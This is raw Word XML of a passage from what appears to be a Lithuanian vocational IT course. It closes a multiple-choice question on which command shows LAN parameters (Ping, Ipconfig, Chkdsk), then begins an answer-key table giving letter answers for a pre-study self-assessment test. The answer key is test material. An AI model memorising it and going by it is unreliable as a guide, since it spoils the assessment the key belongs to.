        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>ų</w:t>
      </w:r>
      <w:r w:rsidR="00454522" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> galima pasižiūrėti kai kuriuos LAN parametrus?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53B31753" w14:textId="1977376D" w:rsidR="00454522" w:rsidRPr="005A5C28" w:rsidRDefault="00454522" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:contextualSpacing/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>a) Ping</w:t>
      </w:r>
      <w:r w:rsidR="00BC1B53" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18929EA0" w14:textId="0D9613A9" w:rsidR="00454522" w:rsidRPr="005A5C28" w:rsidRDefault="00454522" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:contextualSpacing/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>b) Ipconfig</w:t>
      </w:r>
      <w:r w:rsidR="00BC1B53" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BDC20F0" w14:textId="517D03AC" w:rsidR="00454522" w:rsidRPr="005A5C28" w:rsidRDefault="00454522" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:contextualSpacing/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>c) Chkdsk</w:t>
      </w:r>
      <w:r w:rsidR="00BC1B53" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="526D6BCE" w14:textId="77777777" w:rsidR="006B2E46" w:rsidRPr="005A5C28" w:rsidRDefault="006B2E46" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A7BEDE9" w14:textId="4ACDB053" w:rsidR="006D6864" w:rsidRPr="005A5C28" w:rsidRDefault="006D6864" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="655F8EB4" w14:textId="77777777" w:rsidR="00D040C6" w:rsidRPr="005A5C28" w:rsidRDefault="00D040C6" w:rsidP="0089230F">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Testų ir užduočių atsakymai</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="363A2EAE" w14:textId="3B1422B4" w:rsidR="00210EC1" w:rsidRPr="005A5C28" w:rsidRDefault="00210EC1" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="cyan"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C1F9600" w14:textId="3B1422B4" w:rsidR="008629FA" w:rsidRPr="005A5C28" w:rsidRDefault="008629FA" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>Modulis „</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Įvadas į profesiją“</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02CA4603" w14:textId="3B1422B4" w:rsidR="008629FA" w:rsidRPr="005A5C28" w:rsidRDefault="008629FA" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C9A0723" w14:textId="77777777" w:rsidR="00D040C6" w:rsidRPr="005A5C28" w:rsidRDefault="00D040C6" w:rsidP="0089230F">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:i/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>TESTAS ĮSIVERTINTI GEBĖJIMAMS PRIEŠ PRADEDANT MOKYTIS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="207FCDB6" w14:textId="3B1422B4" w:rsidR="008629FA" w:rsidRPr="005A5C28" w:rsidRDefault="008629FA" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="72283181" w14:textId="3D6CF14D" w:rsidR="001C0B2B" w:rsidRPr="005A5C28" w:rsidRDefault="008629FA"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 xml:space="preserve">TESTO </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>ATSAKYMAI</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w: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2552"/>
        <w:gridCol w:w="1843"/>
        <w:gridCol w:w="2551"/>
      </w:tblGrid>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="0DB4AF43" w14:textId="77777777" w:rsidTr="009574AA">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1686" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="7C2D8E08" w14:textId="77777777" w:rsidR="0085353A" w:rsidRPr="005A5C28" w:rsidRDefault="0085353A" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Klausimo Nr.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2552" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="7AAEC7C2" w14:textId="77777777" w:rsidR="0085353A" w:rsidRPr="005A5C28" w:rsidRDefault="0085353A" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Teisingas atsakymas</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1843" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="1E324B40" w14:textId="77777777" w:rsidR="0085353A" w:rsidRPr="005A5C28" w:rsidRDefault="0085353A" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Klausimo Nr.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="0A7D8DC7" w14:textId="77777777" w:rsidR="0085353A" w:rsidRPr="005A5C28" w:rsidRDefault="0085353A" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Teisingas atsakymas</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="6DFF23BF" w14:textId="77777777" w:rsidTr="009574AA">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1686" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="67B45802" w14:textId="77777777" w:rsidR="0085353A" w:rsidRPr="005A5C28" w:rsidRDefault="0085353A" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2552" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="0CA12730" w14:textId="77777777" w:rsidR="0085353A" w:rsidRPr="005A5C28" w:rsidRDefault="0085353A" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>a</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1843" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="1D69037A" w14:textId="77777777" w:rsidR="0085353A" w:rsidRPr="005A5C28" w:rsidRDefault="0085353A" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="60B72B25" w14:textId="77777777" w:rsidR="0085353A" w:rsidRPr="005A5C28" w:rsidRDefault="0085353A" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>c</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="672F7A88" w14:textId="77777777" w:rsidTr="009574AA">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1686" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="700B5982" w14:textId="77777777" w:rsidR="0085353A" w:rsidRPr="005A5C28" w:rsidRDefault="0085353A" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2552" w:type="dxa"/>
            <w:tcBorders>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="7E75CBA1" w14:textId="77777777" w:rsidR="0085353A" w:rsidRPr="005A5C28" w:rsidRDefault="0085353A" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>b</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1843" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="0811E5FD" w14:textId="77777777" w:rsidR="0085353A" w:rsidRPr="005A5C28" w:rsidRDefault="0085353A" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="31B0D02F" w14:textId="77777777" w:rsidR="0085353A" w:rsidRPr="005A5C28" w:rsidRDefault="0085353A" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>b</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="552B837D" w14:textId="77777777" w:rsidTr="009574AA">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1686" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="237C9CFB" w14:textId="77777777" w:rsidR="0085353A" w:rsidRPr="005A5C28" w:rsidRDefault="0085353A" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2552" w:type="dxa"/>
            <w:tcBorders>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="7E9F2066" w14:textId="77777777" w:rsidR="0085353A" w:rsidRPr="005A5C28" w:rsidRDefault="0085353A" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>b</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1843" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="39AAD361" w14:textId="77777777" w:rsidR="0085353A" w:rsidRPr="005A5C28" w:rsidRDefault="0085353A" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>11</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="697C007C" w14:textId="77777777" w:rsidR="0085353A" w:rsidRPr="005A5C28" w:rsidRDefault="0085353A" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>b</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="64DBFCA4" w14:textId="77777777" w:rsidTr="009574AA">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1686" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="01604894" w14:textId="77777777" w:rsidR="0085353A" w:rsidRPr="005A5C28" w:rsidRDefault="0085353A" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2552" w:type="dxa"/>
            <w:tcBorders>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="65CCF409" w14:textId="77777777" w:rsidR="0085353A" w:rsidRPr="005A5C28" w:rsidRDefault="0085353A" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>b</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1843" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="02BAE5CD" w14:textId="77777777" w:rsidR="0085353A" w:rsidRPr="005A5C28" w:rsidRDefault="0085353A" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>12</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="570E90F5" w14:textId="77777777" w:rsidR="0085353A" w:rsidRPr="005A5C28" w:rsidRDefault="0085353A" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>a</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="3FEEF98B" w14:textId="77777777" w:rsidTr="009574AA">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1686" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="66781729" w14:textId="77777777" w:rsidR="0085353A" w:rsidRPr="005A5C28" w:rsidRDefault="0085353A" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2552" w:type="dxa"/>
            <w:tcBorders>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="281D7C34" w14:textId="77777777" w:rsidR="0085353A" w:rsidRPr="005A5C28" w:rsidRDefault="0085353A" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>c</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1843" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="0E32977B" w14:textId="77777777" w:rsidR="0085353A" w:rsidRPr="005A5C28" w:rsidRDefault="0085353A" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>13</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="45EA1330" w14:textId="77777777" w:rsidR="0085353A" w:rsidRPr="005A5C28" w:rsidRDefault="0085353A" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>c</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
